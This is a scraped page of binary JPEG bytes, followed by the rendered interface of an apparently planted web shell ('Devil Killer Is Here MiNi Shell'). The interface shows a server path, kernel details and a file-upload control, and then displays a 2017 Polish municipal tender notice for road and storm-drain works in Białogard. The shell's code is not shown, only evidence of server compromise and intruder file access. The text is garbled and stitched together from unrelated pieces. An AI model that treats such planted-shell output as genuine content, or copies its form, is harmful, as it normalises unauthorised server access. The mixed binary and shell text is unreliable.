JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170117/9207-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.bialogard.info' target='_blank'>http://bip.bialogard.info</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 9207 - 2017
              z dnia 2017-01-17 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Białogard: Wykonanie części etapu I przebudowy ulic: Polnej, Janusza Sidły, Haliny Konopackiej w Białogardzie wraz z budową kanalizacji deszczowej 
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto Białogard - Urząd Miasta Białogard, krajowy numer identyfikacyjny
              330920452, ul.
              1-go Maja 
              18,
              78-200 
              Białogard, woj.
              zachodniopomorskie, państwo
              Polska, tel.
              943122310, e-mail
              um.sekretariat@bialogard.info, faks
              .
              <br />
              Adres strony internetowej (URL): http://bip.bialogard.info<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.bialogard.info</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.bialogard.info</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty składa się pod rygorem nieważności w formie pisemnej<br />
                Adres:
                <br />Urząd Miasta Białogard - sekretariat (pokój nr 224), ul. 1 Maja 18, 78-200 Białogard</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Wykonanie części etapu I przebudowy ulic: Polnej, Janusza Sidły, Haliny Konopackiej w Białogardzie wraz z budową kanalizacji deszczowej 
<br /><b>Numer referencyjny: </b>IZP.271.1.1.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zamówienie obejmuje wykonanie części etapu 1, gdzie przewidziano do wykonania roboty zgodnie ze wskazaniami przedmiaru, tj. przebudowę odcinka ul. Polnej o  nawierzchni asfaltowej i chodniki z kostki bet.-brukowej po obu stronach. Zakres prac części nr 2 i 3 obejmuje wykonanie robót zgodnie ze wskazaniami przedmiaru, związanych z przebudową ulic Janusza Sidły i Haliny Konopackiej - nawierzchnia z kostki betonowo-brukowej z wzmocnionymi chodnikami z kostki betonowo-brukowej po obu stronach. Wszystkie trzy części zamówienia przewidują budowę kanalizacji deszczowej. Zamówienie nie obejmuje wykonania kanału technologicznego.

Zamówienie podzielone jest na trzy części  i obejmuje w szczególności:
Część nr 1 - przebudowa ulicy Polnej w Białogardzie wraz z budową kanalizacji deszczowej -  roboty drogowe  i kanalizacyjne: roboty pomiarowe, roboty ziemne koparką z transportem, mechaniczne profilowanie i zagęszczenie gruntu rodzimego, ława betonowa z oporem z betonu,,krawężnik betonowy uliczny, obrzeża betonowe, warstwa odsączająca z pospółki pod chodnik, warstwa odsączająca pod jezdnię, podbudowa z kruszywa łamanego pod jezdnię, podbudowa zasadnicza z betonu asfaltowego, geosiatka na skropionej podbudowie, warstwa wiążąca z asfaltobetonu żwirowo-grysowego, warstwa ścieralna, nawierzchnia z kostki betonowej, ściek terenowy z kostki betonowej, regulacja wysokościowa studni rewizyjnych, regulacja kominów zasuw wodociągowych, odtworzenie trasy i punktów wysokościowych, rozebranie nawierzchni bitumicznej, rozebranie podbudowy z kruszywa łamanego, wykopy pod rurociąg i studnie, zasypanie piaskiem, warstwa odsączająca z pospółki, podbudowa z kruszywa łamanego, podbudowa z masy mineralno-bitumicznej, geosiatka o wytrzymałości na rozciąganie, warstwa wiążąca z asfaltobetonu, warstwa ścieralna, podłoże pod kanały z materiałów sypkich z zagęszczeniem, rurociągi ciśnieniowe z rur PCV, studnie rewizyjne kanalizacji deszczowej, studnie uliczne z osadnikiem bez syfonu z kratą żeliwną uchylną, próba szczelności kanałów rurowych, trójnik do połączenia wpustu.
Część nr 2  przebudowa ulicy Janusza Sidły w Białogardzie wraz z budową kanalizacji deszczowej - roboty drogowe i kanalizacyjne: roboty pomiarowe, zdjęcie ziemi roślinnej  wraz z transportem, roboty ziemne koparką wraz z transportem, mechaniczne profilowanie i zagęszczenie gruntu rodzimego, ława betonowa z oporem z betonu, krawężnik betonowy najazdowy, obrzeże betonowe, warstwa odsączająca z pospółki pod chodnik wzmocniony i zjazdy na posesje, warstwa odsączająca pod jezdnię, podbudowa z kruszywa łamanego pod chodnik i zjazdy, podbudowa z kruszywa łamanego pod jezdnię, nawierzchnia z kostki betonowej, ściek terenowy z kostki betonowej, regulacja wysokościowa studni rewizyjnych, regulacja kominów zasuw wodociągowych, odtworzenie trasy i punktów wysokościowych, wykopy pod rurociąg i studnie, zasypanie piaskiem, podłoża pod kanały z materiałów sypkich z zagęszczeniem, rurociągi ciśnieniowe z rur PCV, studnie rewizyjne kanalizacji deszczowej, studnie uliczne z osadnikiem bez syfonu z kratą żeliwną uchylną, próba szczelności kanałów rurowych, montaż separatora lamelowego, wykonanie wylotu betonowego.
Część nr 3: przebudowa ulicy Haliny Konopackiej w Białogardzie wraz z budową kanalizacji deszczowej - roboty drogowe i kanalizacyjne: roboty pomiarowe, roboty ziemne koparką z transportem, mechaniczne profilowanie i zagęszczenie gruntu rodzimego, ława betonowa z oporem z betonu, krawężnik betonowy najazdowy, obrzeże betonowe, warstwa odsączająca z pospółki pod chodnik wzmocniony i zjazdy na posesje, warstwa odsączająca pod jezdnię, podbudowa z kruszywa łamanego pod chodnik i zjazdy, podbudowa z kruszywa łamanego pod jezdnię, nawierzchnia z kostki betonowej, ściek terenowy z kostki betonowej, regulacja wysokościowa studni rewizyjnych, regulacja kominów zasuw wodociągowych, odtworzenie trasy i punktów wysokościowych, wykopy pod rurociąg i studnie, zasypanie piaskiem, podłoża pod kanały z materiałów sypkich z zagęszczeniem, rurociągi ciśnieniowe z rur PCV, studnie rewizyjne kanalizacji deszczowej, studnie uliczne z osadnikiem bez syfonu z kratą żeliwną uchylną, próba szczelności kanałów rurowych, próba szczelności kanałów rurowych, montaż separatora lamelowego, wykonanie wylotu betonowego.
Roboty towarzyszące oraz tymczasowe, nie objęte dokumentacją projektową i przedmiarem robót, konieczne  do uwzględnienia przy ww. częściach: uporządkowanie terenu objętego zamówieniem, zabezpieczenie mediów (woda, energia elektryczna, itp.), wykonanie dokumentacji powykonawczej, oznakowanie i zabezpieczenie terenu, na którym wykonywane będą roboty budowlane, opracowanie projektu tymczasowej organizacji ruchu.
Szczegółowy opis przedmiotu zamówienia zawierają: projekt budowlany, specyfikacja techniczna wykonania i odbioru robót, przedmiary robót.


Wykonawca zobowiązany jest do zatrudnienia na okres realizacji zamówienia na podstawie umowy o pracę osób wykonujących w zakresie realizacji zamówienia czynności:
W zakresie realizacji części nr 1: roboty ziemne koparką, mechaniczne profilowanie i zagęszczenie gruntu rodzimego,   ława betonowa z oporem, krawężnik betonowy uliczny, obrzeża betonowe,  warstwa odsączająca z pospółki pod chodnik, warstwa odsączająca pod jezdnię, podbudowa z kruszywa łamanego pod jezdnię, podbudowa zasadnicza z betonu asfaltowego, geosiatka na skropionej podbudowie,  warstwa wiążąca z asfaltobetonu żwirowo-grysowego, warstwa ścieralna,  nawierzchnia z kostki betonowej, ściek terenowy z kostki betonowej, regulacja wysokościowa studni rewizyjnych, regulacja kominów zasuw wodociągowych, rozebranie nawierzchni bitumicznej, rozebranie podbudowy z kruszywa łamanego, wykopy pod rurociąg i studnie,  zasypanie piaskiem, warstwa odsączająca z pospółki, podbudowa z kruszywa łamanego, podbudowa z masy mineralno-bitumicznej, geosiatka, warstwa wiążąca asfaltobetonu, ścieralna, podłoże pod kanały z materiałów sypkich z zagęszczeniem,  rurociągi ciśnieniowe z rur PCV, studnie rewizyjne kanalizacji deszczowej, studnie uliczne z osadnikiem bez syfonu z kratą żeliwną uchylną, próba szczelności kanałów rurowych, trójnik do połączenia wpustu.
W zakresie realizacji części nr 2: zdjęcie ziemi roślinnej, roboty ziemne koparką, mechaniczne profilowanie i zagęszczenie gruntu rodzimego, ława betonowa z oporem, krawężnik betonowy najazdowy, obrzeże betonowe, warstwa odsączająca z pospółki pod chodnik wzmocniony i zjazdy na posesje, warstwa odsączająca pod jezdnię, podbudowa z kruszywa łamanego pod chodnik i zjazdy, podbudowa z kruszywa łamanego pod jezdnię, nawierzchnia z kostki betonowej, ściek terenowy z kostki betonowej, regulacja wysokościowa studni rewizyjnych, regulacja kominów zasuw wodociągowych, wykopy pod rurociąg i studnie, zasypanie piaskiem, podłoża pod kanały z materiałów sypkich, rurociągi ciśnieniowe z rur PCV, studnie rewizyjne kanalizacji deszczowej, studnie uliczne z osadnikiem bez syfonu z kratą żeliwną uchylną, próba szczelności kanałów rurowych, montaż separatora lamelowego, wykonanie wylotu betonowego.        
W zakresie realizacji części nr 3: roboty ziemne koparką wraz z transportem 5 km, mechaniczne profilowanie i zagęszczenie gruntu rodzimego, ława betonowa z oporem, krawężnik betonowy najazdowy, obrzeże betonowe, warstwa odsączająca z pospółki pod chodnik wzmocniony i zjazdy na posesje, warstwa odsączająca pod jezdnię, podbudowa z kruszywa łamanego pod chodnik i zjazdy, podbudowa z kruszywa łamanego pod jezdnię, nawierzchnia z kostki betonowej, ściek terenowy z kostki betonowej, regulacja wysokościowa studni rewizyjnych, regulacja kominów zasuw wodociągowych, wykopy pod rurociąg i studnie,  zasypanie piaskiem, podłoża pod kanały z materiałów sypkich, rurociągi ciśnieniowe z rur PCV, studnie rewizyjne kanalizacji deszczowej, studnie uliczne z osadnikiem bez syfonu z kratą żeliwną uchylną, próba szczelności kanałów rurowych, montaż separatora lamelowego,  wykonanie wylotu betonowego.

W zakresie każdej części Wykonawca zobowiązany jest do: przedłożenia harmonogramu rzeczowo-finansowego do zatwierdzenia przez Zamawiającego, zorganizowania zaplecza robót oraz urządzenia i zabezpieczenia na własny koszt terenu budowy (koszty bieżącej eksploatacji sieci wodociągowej, elektrycznej, zapewnienie ogrzewania itp. podczas realizacji przedmiotu umowy będzie ponosić Wykonawca), sporządzenia przed rozpoczęciem robót budowlanych planu bezpieczeństwa i ochrony zdrowia, oznakowania i zabezpieczenia terenu robót, zapewnienia na terenie budowy oraz terenach przyległych należytego ładu i porządku, przestrzegania przepisów bhp, ochrony obiektów i sieci znajdujących się na terenie robót, zgłaszania inspektorowi nadzoru terminu zakończenia robót zanikających; jeżeli Wykonawca nie dopełni tego obowiązku jest zobowiązany odkryć roboty, a następnie przywrócić je do stanu poprzedniego na własny koszt, wykonania robót budowlanych zgodnie z projektem budowlanym, zasadami wiedzy technicznej i sztuki budowlanej, obowiązującymi przepisami i normami, harmonogramem rzeczowo-finansowym przedłożonym Zamawiającemu oraz oddania przedmiotu umowy w terminie, utrzymania terenu budowy w stanie wolnym od przeszkód komunikacyjnych oraz składowania urządzeń i materiałów w sposób nie powodujący kolizji, zapewnienia na własny koszt transportu odpadów do miejsc ich wykorzystania lub utylizacji, łącznie 
z kosztami utylizacji, stosowania się do zaleceń Zamawiającego w zakresie ewentualnych zmian dokumentacji i wprowadzania robót dodatkowych, zamiennych i zaniechanych, skompletowania wszystkich wyników badań, pomiarów, świadectw jakości, certyfikatów, kart gwarancyjnych, schematów, instrukcji, w tym bhp i p.poż. przed zgłoszeniem robót do odbioru, wykonania dokumentacji powykonawczej, wykonania dodatkowych badań, pomiarów lub ekspertyz w porozumieniu z Zamawiającym w przypadku wątpliwości Zamawiającego, co do jakości robót lub stwierdzenia wad oraz poniesienie kosztów w przypadku wyników negatywnych, zapewnienie wykonania i kierowania robotami objętymi umową przez osoby posiadające stosowne kwalifikacje zawodowe, po zakończeniu robót budowlanych doprowadzenia stanu terenu przylegającego do terenu budowy do stanu pierwotnego, uporządkowania terenu budowy, oznakowania zgodnego ze stałą organizacją ruchu i przekazanie go Zamawiającemu, niezwłocznego informowania Zamawiającego o wystąpieniu zdarzeń lub okoliczności, które mogą utrudnić terminową realizację części lub całości przedmiotu umowy w terminie nie dłuższym niż 7 dni od daty wystąpienia zdarzenia, ponoszenia wyłącznej odpowiedzialności za wszelkie szkody będące następstwem niewykonania lub nienależytego wykonania przedmiotu umowy, które to szkody Wykonawca zobowiązuje się pokryć w pełnej wysokości.<br /><br /><b>II.5) Główny kod CPV: </b>45111200-0<br /><b> Dodatkowe kody CPV:</b>45233200-1,
                45231100-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje udzielenie w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy robót budowlanych zamówienia polegającego na powtórzeniu podobnych prac w wysokości 50% wartości zamówienia podstawowego, zgodnych z przedmiotem niniejszego zamówienia. 
Przez prace podobne Zamawiający rozumie roboty, których zakres jest zgodny z zakresem zamówienia podstawowego. 
Szczegółowy zakres zamówienia określony zostanie w toku odrębnego postępowania o udzielenie zamówienia publicznego i może dotyczyć: robót z branży drogowej, robót z branży sanitarnej.
Zamówienia dotyczące robót wskazanych powyżej zostaną udzielone na podstawie odrębnej umowy zgodnie z opracowanym przez Wykonawcę i przyjętym przez Zamawiającego kosztorysem.
Zarówno Zamawiającemu, jak i Wykonawcy nie przysługuje roszczenie o zawarcie umowy na roboty wskazane powyżej, jest to jedynie prawna możliwość zawarcia umowy z dotychczasowym Wykonawcą po wynegocjowaniu jej postanowień w toku wskazanego odrębnego postępowania o udzielenie zamówienia publicznego.
W przypadku gdy wartość zamówienia podobnego będzie niższa bądź równa równowartości kwoty wskazanej w art. 4 pkt 8 ustawy Pzp, Zamawiający udzieli zamówienia w oparciu o regulacje wewnętrzne dotyczące zasad i trybu udzielania w Urzędzie Miasta Białogard zamówień publicznych, których wartość nie przekracza wyrażonej w złotych równowartości kwoty 30 000 euro.
<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 17/08/2017<br /></div><div style="padding-left: 20px">
                    Okres w miesiącach: 3<br /></div><div style="padding-left: 20px">
                    Okres w miesiącach: 3<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w ww. zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Warunek dotyczący części nr 1:
Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że posiada środki finansowe lub posiada zdolność kredytową w wysokości co  najmniej 300 000,00 PLN (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa).
Warunek dotyczący części nr 2 i nr 3:
Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że posiada środki finansowe lub posiada zdolność kredytową w wysokości co  najmniej 200 000,00 PLN na każdą część (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa).
<br />
                Informacje dodatkowe
                UWAGA! Wykonawca składający ofertę na więcej niż jedną część musi spełnić warunek finansowy lub ekonomiczny właściwy dla sumy części (Wykonawca składa ofertę na zadanie nr 1 
i nr 2 musi wykazać posiadanie środków finansowych lub posiadanie zdolności kredytowej 
w wysokości co najmniej 500 000,00 PLN). <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunek dotyczący części nr 1:
Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że wykonał zgodnie ze sztuką budowlaną w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej dwie roboty budowlane o wartości nie mniejszej niż 300 000 PLN brutto każda, polegające na wykonaniu w ramach jednej umowy/zamówienia budowy lub przebudowy drogi obejmującej wykonanie nawierzchni bitumicznej wraz z podbudową i budowy/przebudowy infrastruktury technicznej w postaci instalacji sanitarnych.
Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje 
lub będzie dysponował co najmniej dwoma osobami, które będą uczestniczyć w realizacji zamówienia: 1 osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej, 1 osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych, tj. do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych.

Warunek dotyczący części nr 2 i nr 3:
Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże w każdej części, że wykonał zgodnie ze sztuką budowlaną w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, co najmniej dwie roboty budowlane o wartości nie mniejszej niż 200 000 PLN brutto każda, polegające na wykonaniu w ramach jednej umowy/zamówienia budowy lub przebudowy drogi obejmującej wykonanie nawierzchni z kostki betonowo-brukowej wraz z podbudową i budowy/przebudowy infrastruktury technicznej w postaci instalacji sanitarnych.
Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej dwoma osobami, które będą uczestniczyć w realizacji zamówienia: 1 osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych 
w budownictwie tj. do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej, 1 osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych, tj. do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych 
i kanalizacyjnych.
<br />
